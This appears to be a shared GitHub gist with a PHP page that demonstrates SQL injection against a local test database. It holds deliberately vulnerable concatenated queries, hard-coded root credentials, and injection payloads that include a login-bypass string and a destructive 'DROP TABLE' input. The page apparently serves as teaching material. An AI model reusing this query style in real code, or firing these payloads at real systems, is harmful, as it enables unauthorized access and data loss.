Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
<html>
<head>
<title>MySQL Database</title>
</head>
<body>
<?php
$user = 'root';
$password = 'root';
$db = 'sql_injection';
$host = 'localhost';
$port = 8889;
// Create connection
$conn = new mysqli($host, $user, $password, $db);
// Check connection
/*if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
} else {
echo "Connection is okay" . "<br>";
}*/
?>
<h1>SQL INJECTION</h1>
<h2>Database User</h2>
<?php
// SHOWING ALL THE RESULTS FROM DB USER
$sql = "SELECT id, name, email, password FROM USER";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
// output data of each row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"] . " - name: " . $row["name"] . " - email: " . $row["email"] . "<br>";
}
} else {
echo "0 results";
}
?>
<h2>Examples</h2>
<H3>Example One</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
$sql_injection = "SELECT * FROM User WHERE id = 1000";
// examples
$example_one = " or 1=1";
// tests -> only change the number of example
$sql_injection_test = $sql_injection . $example_one;
$result = $conn->query($sql_injection_test);
echo "SQL used: " . $sql_injection_test . "<br><br>";
echo "Input: " . $example_one . "<br><br>";
if ($result->num_rows > 0) {
echo "The attack was successful!" . "<br><br>";
echo "Answer: The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true!" . "<br><br>";
// output data of each row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"] . " - name: " . $row["name"] . " - email: " . $row["email"] . "<br>";
}
} else {
echo "The attack was not successful!" . "<br><br>";
}
?>
<H3>Example Two</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
$sql_injection = "SELECT * FROM User WHERE email = 'bobo@email.com' and password = '1234'";
// examples
$example_two = " or 1=1";
// tests -> only change the number of example
$sql_injection_test = $sql_injection . $example_two;
$result = $conn->query($sql_injection_test);
echo "SQL used: " . $sql_injection_test . "<br><br>";
echo "Input: " . $example_two . "<br><br>";
if ($result->num_rows > 0) {
echo "The attack was successful!" . "<br><br>";
echo "Answer: The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true!" . "<br><br>";
// output data of each row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"] . " - name: " . $row["name"] . " - email: " . $row["email"] . "<br>";
}
} else {
echo "The attack was not successful!" . "<br><br>";
}
?>
<H3>Example Three</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
// examples
$user = "1";
$password = "1' or '1'='1";
$sql_injection = "SELECT * FROM User WHERE email = '" . $user . "' and password = '" . $password . "'";
$result = $conn->query($sql_injection);
echo "SQL used: " . $sql_injection . "<br><br>";
echo "Input user: " . $user . "<br>";
echo "Input password: " . $password . "<br><br>";
if ($result->num_rows > 0) {
echo "The attack was successful!" . "<br><br>";
echo "Answer:";
// output data of each row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"] . " - name: " . $row["name"] . " - email: " . $row["email"] . "<br>";
}
} else {
echo "The attack was not successful!" . "<br><br>";
}
?>
<H3>Example Four</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
// examples
$id = "1; DROP TABLE User1";
$sql_injection = "SELECT * FROM User WHERE id=" . $id;
$result = $conn->query($sql_injection);
echo "SQL used: " . $sql_injection . "<br><br>";
echo "Input id: " . $id . "<br>";
?>
<?php
// closing the connection
// phpinfo();
$conn->close();
?>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment